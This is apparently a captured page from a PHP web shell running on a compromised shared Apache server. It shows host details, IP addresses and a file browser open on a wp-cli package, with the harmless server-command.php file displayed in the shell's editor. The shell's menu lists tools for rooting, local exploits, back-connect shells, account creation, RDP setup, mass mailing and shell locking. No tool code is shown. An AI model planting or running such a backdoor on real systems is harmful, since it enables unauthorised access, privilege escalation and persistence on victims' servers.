Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
server-command /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
features
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.actrc
129
B
-rw-r--r--
.distignore
157
B
-rw-r--r--
.editorconfig
591
B
-rw-r--r--
CONTRIBUTING.md
538
B
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
4.33
KB
-rw-r--r--
behat.yml
126
B
-rw-r--r--
composer.json
1.7
KB
-rw-r--r--
phpcs.xml.dist
2.2
KB
-rw-r--r--
router.php
3.58
KB
-rw-r--r--
server-command.php
491
B
-rw-r--r--
wp-cli.yml
32
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server-command.php
<?php if ( ! class_exists( 'WP_CLI' ) ) { return; } $wpcli_server_autoloader = __DIR__ . '/vendor/autoload.php'; if ( file_exists( $wpcli_server_autoloader ) ) { require_once $wpcli_server_autoloader; } WP_CLI::add_command( 'server', 'Server_Command', array( 'before_invoke' => function () { $min_version = '5.4'; if ( version_compare( PHP_VERSION, $min_version, '<' ) ) { WP_CLI::error( "The `wp server` command requires PHP {$min_version} or newer." ); } }, ) );
Close